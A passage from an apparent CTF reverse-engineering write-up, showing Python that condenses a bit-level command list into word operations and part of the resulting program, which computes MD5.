    <span class="k">if</span> <span class="n">m</span> <span class="ow">is</span> <span class="bp">None</span><span class="p">:</span>
        <span class="k">return</span> <span class="bp">None</span>
    <span class="k">return</span> <span class="nb">int</span><span class="p">(</span><span class="n">m</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="mi">0</span><span class="p">),</span> <span class="n">m</span><span class="p">[</span><span class="mi">3</span><span class="p">],</span> <span class="nb">int</span><span class="p">(</span><span class="n">m</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="mi">0</span><span class="p">),</span> <span class="nb">int</span><span class="p">(</span><span class="n">m</span><span class="p">[</span><span class="mi">4</span><span class="p">],</span> <span class="mi">0</span><span class="p">)</span>

<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s">'commands.txt'</span><span class="p">,</span> <span class="s">'r'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
    <span class="n">commands</span> <span class="o">=</span> <span class="nb">list</span><span class="p">(</span><span class="nb">map</span><span class="p">(</span><span class="nb">str</span><span class="p">.</span><span class="n">rstrip</span><span class="p">,</span> <span class="n">f</span><span class="p">))</span>

<span class="n">ncommands</span> <span class="o">=</span> <span class="p">[]</span>

<span class="n">idx</span> <span class="o">=</span> <span class="mi">0</span>
<span class="k">while</span> <span class="n">idx</span> <span class="o">&lt;</span> <span class="nb">len</span><span class="p">(</span><span class="n">commands</span><span class="p">):</span>
    <span class="n">cmd</span> <span class="o">=</span> <span class="n">commands</span><span class="p">[</span><span class="n">idx</span><span class="p">]</span>
    <span class="k">if</span> <span class="n">MOV</span><span class="p">(</span><span class="n">cmd</span><span class="p">):</span>
        <span class="n">chunk</span> <span class="o">=</span> <span class="n">commands</span><span class="p">[</span><span class="n">idx</span><span class="p">:</span><span class="n">idx</span><span class="o">+</span><span class="mi">32</span><span class="p">]</span>
        <span class="n">outs</span><span class="p">,</span> <span class="n">vals</span> <span class="o">=</span> <span class="nb">zip</span><span class="p">(</span><span class="o">*</span><span class="p">[</span><span class="n">MOV</span><span class="p">(</span><span class="n">cmd</span><span class="p">)</span> <span class="k">for</span> <span class="n">cmd</span> <span class="ow">in</span> <span class="n">chunk</span><span class="p">])</span>
        <span class="k">assert</span> <span class="n">outs</span> <span class="o">==</span> <span class="nb">tuple</span><span class="p">(</span><span class="nb">range</span><span class="p">(</span><span class="n">outs</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">outs</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="o">-</span> <span class="mi">1</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">))</span> <span class="ow">and</span> <span class="n">outs</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="o">&amp;</span> <span class="mi">31</span> <span class="o">==</span> <span class="mi">0</span>
        <span class="n">val</span> <span class="o">=</span> <span class="mi">0</span>
        <span class="k">for</span> <span class="n">o</span><span class="p">,</span> <span class="n">v</span> <span class="ow">in</span> <span class="nb">zip</span><span class="p">(</span><span class="n">outs</span><span class="p">,</span> <span class="n">vals</span><span class="p">):</span>
            <span class="n">i</span> <span class="o">=</span> <span class="n">o</span> <span class="o">&amp;</span> <span class="mi">31</span>
            <span class="n">val</span> <span class="o">|=</span> <span class="n">v</span> <span class="o">&lt;&lt;</span> <span class="mi">8</span> <span class="o">*</span> <span class="p">(</span><span class="n">i</span> <span class="o">//</span> <span class="mi">8</span><span class="p">)</span> <span class="o">+</span> <span class="mi">7</span> <span class="o">-</span> <span class="p">(</span><span class="n">i</span> <span class="o">%</span> <span class="mi">8</span><span class="p">)</span>
        <span class="n">ncommands</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="sa">f</span><span class="s">'A[</span><span class="si">{</span><span class="n">outs</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span><span class="o">&gt;&gt;</span><span class="mi">5</span><span class="si">}</span><span class="s">] = </span><span class="si">{</span><span class="n">val</span><span class="si">:</span><span class="c1">#x</span><span class="si">}</span><span class="s">'</span><span class="p">)</span>
        <span class="n">idx</span> <span class="o">+=</span> <span class="mi">32</span>
    <span class="k">elif</span> <span class="n">BITW</span><span class="p">(</span><span class="n">cmd</span><span class="p">)</span> <span class="ow">and</span> <span class="n">BITW</span><span class="p">(</span><span class="n">cmd</span><span class="p">)[</span><span class="mi">1</span><span class="p">]</span> <span class="o">==</span> <span class="n">BITW</span><span class="p">(</span><span class="n">commands</span><span class="p">[</span><span class="n">idx</span> <span class="o">+</span> <span class="mi">1</span><span class="p">])[</span><span class="mi">1</span><span class="p">]:</span>
        <span class="n">chunk</span> <span class="o">=</span> <span class="n">commands</span><span class="p">[</span><span class="n">idx</span><span class="p">:</span><span class="n">idx</span><span class="o">+</span><span class="mi">32</span><span class="p">]</span>
        <span class="n">outs</span><span class="p">,</span> <span class="n">ops</span><span class="p">,</span> <span class="n">in1s</span><span class="p">,</span> <span class="n">in2s</span> <span class="o">=</span> <span class="nb">zip</span><span class="p">(</span><span class="o">*</span><span class="p">[</span><span class="n">BITW</span><span class="p">(</span><span class="n">cmd</span><span class="p">)</span> <span class="k">for</span> <span class="n">cmd</span> <span class="ow">in</span> <span class="n">chunk</span><span class="p">])</span>
        <span class="k">if</span> <span class="n">outs</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">&amp;</span> <span class="mi">31</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
            <span class="k">assert</span> <span class="n">outs</span> <span class="o">==</span> <span class="nb">tuple</span><span class="p">(</span><span class="nb">range</span><span class="p">(</span><span class="n">outs</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">outs</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="mi">1</span><span class="p">))</span> <span class="ow">and</span> <span class="n">outs</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">&amp;</span> <span class="mi">31</span> <span class="o">==</span> <span class="mi">0</span>
            <span class="k">assert</span> <span class="nb">len</span><span class="p">(</span><span class="nb">set</span><span class="p">(</span><span class="n">ops</span><span class="p">))</span> <span class="o">==</span> <span class="mi">1</span>
            <span class="k">assert</span> <span class="n">in1s</span> <span class="o">==</span> <span class="nb">tuple</span><span class="p">(</span><span class="nb">range</span><span class="p">(</span><span class="n">in1s</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">in1s</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="mi">1</span><span class="p">))</span> <span class="ow">and</span> <span class="n">in1s</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">&amp;</span> <span class="mi">31</span> <span class="o">==</span> <span class="mi">0</span>
            <span class="k">assert</span> <span class="n">in2s</span> <span class="o">==</span> <span class="nb">tuple</span><span class="p">(</span><span class="nb">range</span><span class="p">(</span><span class="n">in2s</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">in2s</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="mi">1</span><span class="p">))</span> <span class="ow">and</span> <span class="n">in2s</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">&amp;</span> <span class="mi">31</span> <span class="o">==</span> <span class="mi">0</span>
            <span class="n">ncommands</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="sa">f</span><span class="s">'A[</span><span class="si">{</span><span class="n">outs</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="o">&gt;&gt;</span><span class="mi">5</span><span class="si">}</span><span class="s">] = A[</span><span class="si">{</span><span class="n">in1s</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="o">&gt;&gt;</span><span class="mi">5</span><span class="si">}</span><span class="s">] </span><span class="si">{</span><span class="n">ops</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="si">}</span><span class="s"> A[</span><span class="si">{</span><span class="n">in2s</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="o">&gt;&gt;</span><span class="mi">5</span><span class="si">}</span><span class="s">]'</span><span class="p">)</span>
        <span class="k">else</span><span class="p">:</span>
            <span class="n">rotl</span> <span class="o">=</span> <span class="p">(</span><span class="n">outs</span><span class="p">.</span><span class="n">index</span><span class="p">(</span><span class="nb">min</span><span class="p">(</span><span class="n">outs</span><span class="p">)</span> <span class="o">+</span> <span class="mi">7</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mi">31</span>
            <span class="n">ncommands</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="sa">f</span><span class="s">'A[</span><span class="si">{</span><span class="n">outs</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="o">&gt;&gt;</span><span class="mi">5</span><span class="si">}</span><span class="s">] = rotl(A[</span><span class="si">{</span><span class="n">in1s</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="o">&gt;&gt;</span><span class="mi">5</span><span class="si">}</span><span class="s">] </span><span class="si">{</span><span class="n">ops</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="si">}</span><span class="s"> A[</span><span class="si">{</span><span class="n">in2s</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="o">&gt;&gt;</span><span class="mi">5</span><span class="si">}</span><span class="s">], </span><span class="si">{</span><span class="n">rotl</span><span class="si">}</span><span class="s">)'</span><span class="p">)</span>
            <span class="k">assert</span> <span class="nb">all</span><span class="p">(</span><span class="n">in1s</span><span class="p">[</span><span class="mi">24</span> <span class="o">-</span> <span class="mi">8</span> <span class="o">*</span> <span class="p">(</span><span class="n">i</span> <span class="o">//</span> <span class="mi">8</span><span class="p">)</span> <span class="o">+</span> <span class="p">(</span><span class="n">i</span> <span class="o">%</span> <span class="mi">8</span><span class="p">)]</span> <span class="o">-</span> <span class="nb">min</span><span class="p">(</span><span class="n">in1s</span><span class="p">)</span> <span class="o">==</span> <span class="n">i</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">32</span><span class="p">))</span>
            <span class="k">assert</span> <span class="nb">all</span><span class="p">(</span><span class="n">in2s</span><span class="p">[</span><span class="mi">24</span> <span class="o">-</span> <span class="mi">8</span> <span class="o">*</span> <span class="p">(</span><span class="n">i</span> <span class="o">//</span> <span class="mi">8</span><span class="p">)</span> <span class="o">+</span> <span class="p">(</span><span class="n">i</span> <span class="o">%</span> <span class="mi">8</span><span class="p">)]</span> <span class="o">-</span> <span class="nb">min</span><span class="p">(</span><span class="n">in2s</span><span class="p">)</span> <span class="o">==</span> <span class="n">i</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">32</span><span class="p">))</span>
        <span class="n">idx</span> <span class="o">+=</span> <span class="mi">32</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="n">chunk</span> <span class="o">=</span> <span class="n">commands</span><span class="p">[</span><span class="n">idx</span><span class="p">:</span><span class="n">idx</span><span class="o">+</span><span class="mi">157</span><span class="p">]</span>
        <span class="n">outs</span><span class="p">,</span> <span class="n">ops</span><span class="p">,</span> <span class="n">in1s</span><span class="p">,</span> <span class="n">in2s</span> <span class="o">=</span> <span class="nb">zip</span><span class="p">(</span><span class="o">*</span><span class="p">[</span><span class="n">BITW</span><span class="p">(</span><span class="n">cmd</span><span class="p">)</span> <span class="k">for</span> <span class="n">cmd</span> <span class="ow">in</span> <span class="n">chunk</span><span class="p">])</span>
        <span class="k">assert</span> <span class="n">outs</span><span class="p">.</span><span class="n">count</span><span class="p">(</span><span class="mh">0xb40</span><span class="p">)</span> <span class="o">==</span> <span class="mi">63</span> <span class="ow">and</span> <span class="n">outs</span><span class="p">.</span><span class="n">count</span><span class="p">(</span><span class="mh">0xb41</span><span class="p">)</span> <span class="o">==</span> <span class="mi">62</span>
        <span class="k">assert</span> <span class="n">ops</span> <span class="o">==</span> <span class="p">(</span><span class="s">'^'</span><span class="p">,</span> <span class="s">'&amp;'</span><span class="p">)</span> <span class="o">+</span> <span class="p">(</span><span class="s">'^'</span><span class="p">,</span> <span class="s">'^'</span><span class="p">,</span> <span class="s">'&amp;'</span><span class="p">,</span> <span class="s">'&amp;'</span><span class="p">,</span> <span class="s">'|'</span><span class="p">)</span> <span class="o">*</span> <span class="mi">31</span>
        <span class="k">assert</span> <span class="n">in1s</span><span class="p">.</span><span class="n">count</span><span class="p">(</span><span class="mh">0xb40</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span> <span class="ow">and</span> <span class="n">in1s</span><span class="p">.</span><span class="n">count</span><span class="p">(</span><span class="mh">0xb41</span><span class="p">)</span> <span class="o">==</span> <span class="mi">93</span>
        <span class="k">assert</span> <span class="n">in2s</span><span class="p">.</span><span class="n">count</span><span class="p">(</span><span class="mh">0xb40</span><span class="p">)</span> <span class="o">==</span> <span class="mi">93</span> <span class="ow">and</span> <span class="n">in2s</span><span class="p">.</span><span class="n">count</span><span class="p">(</span><span class="mh">0xb41</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span>
        <span class="k">assert</span> <span class="n">outs</span><span class="p">[</span><span class="mi">33</span><span class="p">]</span> <span class="o">&amp;</span> <span class="mi">31</span> <span class="o">==</span> <span class="mi">0</span> <span class="ow">and</span> <span class="n">in1s</span><span class="p">[</span><span class="mi">32</span><span class="p">]</span> <span class="o">&amp;</span> <span class="mi">31</span> <span class="o">==</span> <span class="mi">0</span> <span class="ow">and</span> <span class="n">in2s</span><span class="p">[</span><span class="mi">32</span><span class="p">]</span> <span class="o">&amp;</span> <span class="mi">31</span> <span class="o">==</span> <span class="mi">0</span>
        <span class="n">ncommands</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="sa">f</span><span class="s">'A[</span><span class="si">{</span><span class="n">outs</span><span class="p">[</span><span class="mi">33</span><span class="p">]</span><span class="o">&gt;&gt;</span><span class="mi">5</span><span class="si">}</span><span class="s">] = A[</span><span class="si">{</span><span class="n">in1s</span><span class="p">[</span><span class="mi">32</span><span class="p">]</span><span class="o">&gt;&gt;</span><span class="mi">5</span><span class="si">}</span><span class="s">] + A[</span><span class="si">{</span><span class="n">in2s</span><span class="p">[</span><span class="mi">32</span><span class="p">]</span><span class="o">&gt;&gt;</span><span class="mi">5</span><span class="si">}</span><span class="s">]'</span><span class="p">)</span>
        <span class="n">idx</span> <span class="o">+=</span> <span class="mi">157</span>

<span class="k">print</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">ncommands</span><span class="p">))</span>

<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s">'commands2.txt'</span><span class="p">,</span> <span class="s">'w'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
    <span class="k">for</span> <span class="n">cmd</span> <span class="ow">in</span> <span class="n">ncommands</span><span class="p">:</span>
        <span class="n">f</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="n">cmd</span> <span class="o">+</span> <span class="s">'</span><span class="se">\n</span><span class="s">'</span><span class="p">)</span>
</code></pre></div></div>

<p>There were some tricky implementation details like <code class="language-plaintext highlighter-rouge">rotl()</code> somehow being part of the logic, but in
the end we are left with a much simpler program with “only” 865 lines:</p>

<div class="highlight" style="height:300px;">
<pre class="highlight">
<code>A[9] = 0xffffffff
A[125] = 0x0
A[126] = 0x0
A[127] = 0x0
A[128] = 0x0
A[0] = A[125] | A[8]
A[1] = A[126] | A[8]
A[2] = A[127] | A[8]
A[3] = A[128] | A[8]
A[10] = 0xd76aa478
A[11] = 0xe8c7b756
A[12] = 0x242070db
A[13] = 0xc1bdceee
A[14] = 0xf57c0faf
A[15] = 0x4787c62a
A[16] = 0xa8304613
A[17] = 0xfd469501
A[18] = 0x698098d8
A[19] = 0x8b44f7af
A[20] = 0xffff5bb1
A[21] = 0x895cd7be
A[22] = 0x6b901122
A[23] = 0xfd987193
A[24] = 0xa679438e
A[25] = 0x49b40821
A[26] = 0xf61e2562
A[27] = 0xc040b340
A[28] = 0x265e5a51
A[29] = 0xe9b6c7aa
A[30] = 0xd62f105d
A[31] = 0x2441453
A[32] = 0xd8a1e681
A[33] = 0xe7d3fbc8
A[34] = 0x21e1cde6
A[35] = 0xc33707d6
A[36] = 0xf4d50d87
A[37] = 0x455a14ed
A[38] = 0xa9e3e905
A[39] = 0xfcefa3f8
A[40] = 0x676f02d9
A[41] = 0x8d2a4c8a
A[42] = 0xfffa3942
A[43] = 0x8771f681
A[44] = 0x6d9d6122
A[45] = 0xfde5380c
A[46] = 0xa4beea44
A[47] = 0x4bdecfa9
A[48] = 0xf6bb4b60
A[49] = 0xbebfbc70
A[50] = 0x289b7ec6
A[51] = 0xeaa127fa
A[52] = 0xd4ef3085
A[53] = 0x4881d05
A[54] = 0xd9d4d039
A[55] = 0xe6db99e5
A[56] = 0x1fa27cf8
A[57] = 0xc4ac5665
A[58] = 0xf4292244
A[59] = 0x432aff97
A[60] = 0xab9423a7
A[61] = 0xfc93a039
A[62] = 0x655b59c3
A[63] = 0x8f0ccc92
A[64] = 0xffeff47d
A[65] = 0x85845dd1
A[66] = 0x6fa87e4f
A[67] = 0xfe2ce6e0
A[68] = 0xa3014314
A[69] = 0x4e0811a1
A[70] = 0xf7537e82
A[71] = 0xbd3af235
A[72] = 0x2ad7d2bb
A[73] = 0xeb86d391
A[5] = A[1] &amp; A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] &amp; A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[74]
A[4] = A[6] + A[10]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 7)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] &amp; A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] &amp; A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[75]
A[4] = A[6] + A[11]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 12)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] &amp; A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] &amp; A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[76]
A[4] = A[6] + A[12]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 17)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] &amp; A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] &amp; A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[77]
A[4] = A[6] + A[13]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 22)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] &amp; A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] &amp; A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[78]
A[4] = A[6] + A[14]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 7)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] &amp; A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] &amp; A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[79]
A[4] = A[6] + A[15]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 12)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] &amp; A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] &amp; A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[80]
A[4] = A[6] + A[16]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 17)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] &amp; A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] &amp; A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[81]
A[4] = A[6] + A[17]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 22)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] &amp; A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] &amp; A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[82]
A[4] = A[6] + A[18]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 7)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] &amp; A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] &amp; A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[83]
A[4] = A[6] + A[19]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 12)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] &amp; A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] &amp; A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[84]
A[4] = A[6] + A[20]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 17)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] &amp; A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] &amp; A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[85]
A[4] = A[6] + A[21]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 22)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] &amp; A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] &amp; A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[86]
A[4] = A[6] + A[22]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 7)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] &amp; A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] &amp; A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[87]
A[4] = A[6] + A[23]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 12)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] &amp; A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] &amp; A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[88]
A[4] = A[6] + A[24]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 17)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] &amp; A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] &amp; A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[89]
A[4] = A[6] + A[25]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 22)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] &amp; A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] &amp; A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[75]
A[4] = A[6] + A[26]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 5)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] &amp; A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] &amp; A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[80]
A[4] = A[6] + A[27]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 9)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] &amp; A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] &amp; A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[85]
A[4] = A[6] + A[28]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 14)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] &amp; A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] &amp; A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[74]
A[4] = A[6] + A[29]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 20)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] &amp; A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] &amp; A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[79]
A[4] = A[6] + A[30]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 5)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] &amp; A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] &amp; A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[84]
A[4] = A[6] + A[31]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 9)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] &amp; A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] &amp; A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[89]
A[4] = A[6] + A[32]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 14)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] &amp; A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] &amp; A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[78]
A[4] = A[6] + A[33]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 20)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] &amp; A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] &amp; A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[83]
A[4] = A[6] + A[34]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 5)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] &amp; A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] &amp; A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[88]
A[4] = A[6] + A[35]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 9)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] &amp; A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] &amp; A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[77]
A[4] = A[6] + A[36]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 14)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] &amp; A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] &amp; A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[82]
A[4] = A[6] + A[37]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 20)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] &amp; A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] &amp; A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[87]
A[4] = A[6] + A[38]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 5)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] &amp; A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] &amp; A[2]
A[4] = A[5] | A[7]
